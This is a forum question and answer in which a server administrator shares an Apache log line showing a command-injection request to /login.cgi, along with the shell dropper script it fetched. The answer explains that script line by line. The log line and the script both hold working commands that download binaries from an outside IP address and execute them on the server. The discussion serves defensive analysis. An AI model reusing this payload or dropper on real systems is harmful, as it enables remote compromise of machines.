I've been noticing on my servers apache logs, the following strange lines lately:
156.222.222.13 - - [08/Sep/2018:04:27:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.173.159/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
So I made a custom Fail2Ban filter and started banning the IPs requesting these /login.cgi URLs.
But I was curious as to what they were trying to do, so I pulled the script they're trying to execute and I can't seem to figure out what exactly it does. Something about removing arch folders in /var and /tmp?
Anyway, here it is:
#!/bin/sh
u="asgknskjdgn"
bin_names="mmips mipsel arm arm7 powerpc x86_64 x86_32"
http_server="80.211.173.159"
http_port=80
cd /tmp/||cd /var/
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server:$http_port/$name -O -> $u
./$u $name
done
Best Answer
Line by line:
Establishes the
sh
shell, whichever that is, as the shebang line.sh%20/tmp/ks
in the request overrides this, so this line is treated as a normal comment and ignored.Declares an arbitrary name, presumably to avoid colliding with other filenames. I'm not sure why they wouldn't just use
mktemp
, but maybe that is not available on all platforms.Enumerates several common CPU architectures.
The server which has the exploit.
Tries to change directory to somewhere your web server is likely to be able to create files. I believe SELinux will help with this, by enforcing much stricter rules about what the web server can do than the file system does on its own.
For each CPU architecture…
Removes previously tried exploit programs. Unnecessary because of the next line, so can be ignored.
Copies the current shell executable (
/bin/sh
). Can be ignored because of the line after next.Makes everyone have full access to the new file. This should have been after the
wget
command, which is either a sign of a shell scripting newbie or a misdirection technique.Empties out the file. Pointless because of the next line.
Overwrites the file with the exploit script for this architecture.
-O -> $u
could have been written-O - > $u
(the hyphen indicates that the download should be written to standard output) which is equivalent to-O $u
.Runs the exploit script with the architecture as the first argument.
Ends the loop.
It looks like this is a trivial exploit attempt script, trying known exploits against various CPU platforms. I do not know why it overwrites
$u
three times, but those operations could simply be remains from an earlier iteration of the script. Presumably that earlier version had the exploits hard coded rather than dynamically served - the former is easier but almost guarantees that the script will be less effective over time as bugs are patched.